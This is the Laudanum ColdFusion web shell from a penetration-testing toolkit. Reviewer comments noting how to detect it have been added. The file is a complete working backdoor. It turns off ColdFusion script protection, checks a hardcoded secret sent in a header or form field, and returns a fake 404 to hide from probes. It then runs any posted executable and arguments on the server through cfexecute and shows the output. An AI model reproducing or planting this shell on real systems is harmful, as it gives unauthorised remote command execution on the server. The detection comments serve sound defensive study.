<!--- scriptProtect="none" switches off ColdFusion's built-in script protection for incoming variables, so the header and form values read below are used as submitted.
      NOTE(review): this attribute appearing in the same file as a cfexecute call is a static indicator worth matching when scanning a web root. --->
<cfapplication scriptProtect="none">
<!---
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
***  http://laudanum.professionallyevil.com/
***  laudanum@secureideas.net
***
***  Project Leads:
***         Kevin Johnson @secureideas <kjohnson@secureideas.net>
***         Tim Medin @timmedin <tim@securitywhole.com>
***         John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides shell access on the system.
*** Modified by Tim Medin
*** Modified by Matt Presson <@matt_presson>
***     - Added some basic authentication via HTTP header
***     - Resolved cfexecute stripping quotes
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA  02111-1307, USA.
***
***************************************************************************** */
--->

<!--- Shared secret that every request must present before anything else on this page runs.
      NOTE(review): a copy deployed without changing this value still carries the literal below, so the string can be used as a static match when scanning web roots; a changed value will not match. --->
<cfset secretCode = "a208bddb1f68aa8a8641b65d93979740c82fb387" /> <!--- Set this to something unique like a randomly generated SHA1 Hash --->
<!--- Single- and double-quote characters, used further down where the executable name is handed to cfexecute. --->
<cfset QuoteMark = "'" />
<cfset DoubleQuoteMark = """" />

<!--- Authentication: read the caller-supplied code from the X-Auth-Code request header or, when that header is absent, from the POSTed authCode form field. suppliedCode stays an empty string when neither is present. --->
<cfset suppliedCode = "" />
<cfif structKeyExists(GetHttpRequestData().headers, "X-Auth-Code")>
    <cfset suppliedCode = "#StructFind(GetHttpRequestData().headers, "X-Auth-Code")#" />
<cfelseif structKeyExists(FORM, "authCode")>
    <cfset suppliedCode = "#StructFind(FORM, "authCode")#" />
</cfif>
<!--- The check that follows compares suppliedCode with secretCode; on a mismatch the page sets status 404 and aborts, so an unauthenticated request to this URL looks like a missing page. Finding the file therefore depends on inspecting the web root (file inventory or integrity monitoring) rather than on probing the URL. --->

<cfif ( #suppliedCode# neq secretCode )>
    <cfheader statuscode="404" statustext="Page Not Found" />
    <cfabort />
</cfif>

<html>
    <head><title>Laudanum Coldfusion Shell</title></head>
    <body>
    <form action="<cfoutput>#cgi.script_name#</cfoutput>" method="POST">
        <!--- After a submission, re-display the posted cmd and arguments values, encoded with HTMLEditFormat; on first load show the cmd.exe and /c defaults instead.
              The form posts back to the same script with fields named cmd, arguments and authCode, which is what request-body logging for this page would record. --->
        <cfif IsDefined("form.cmd")>
        Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
        Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
        <cfelse>
        Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
        Arguments: <Input type="text" name="arguments" value="/c "><br>
        </cfif>
        <!--- Carries the supplied code forward as the authCode form field, so later submissions of this form pass the check at the top of the page without needing the X-Auth-Code header. --->
        <input type="hidden" name="authCode" value="<cfoutput>#HTMLEditFormat(suppliedCode)#</cfoutput>">
        <input type="submit">
    </form>

<!--- Updated the call to cfexecute to use an array instead of a string. This way quotes are not stripped. --->
<cfif IsDefined("form.cmd")>
    <!--- Split the posted arguments on spaces into an array. The posted executable name has single quotes replaced with double quotes and is run by cfexecute with a 5-second timeout; its output is captured in the variable foo and written back with only "<" replaced by &lt;.
          The program is started by the ColdFusion server process, so a shell or other unexpected child of that process is a detection point in process-creation logs. Where cfexecute is not needed, disabling the tag through ColdFusion sandbox security prevents this block from running. --->
    <cfset argumentsArray = #listToArray(form.arguments, " ")# />

    <pre>
    <cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#argumentsArray#" timeout="5" variable="foo"></cfexecute>
    <cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
    </pre>
</cfif>

    Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.

    <hr/>
    <address>
        Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
        Written by Tim Medin.<br/>
        Bug fixes by Matt Presson<br/>
        Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
    </address>
    </body>
</html>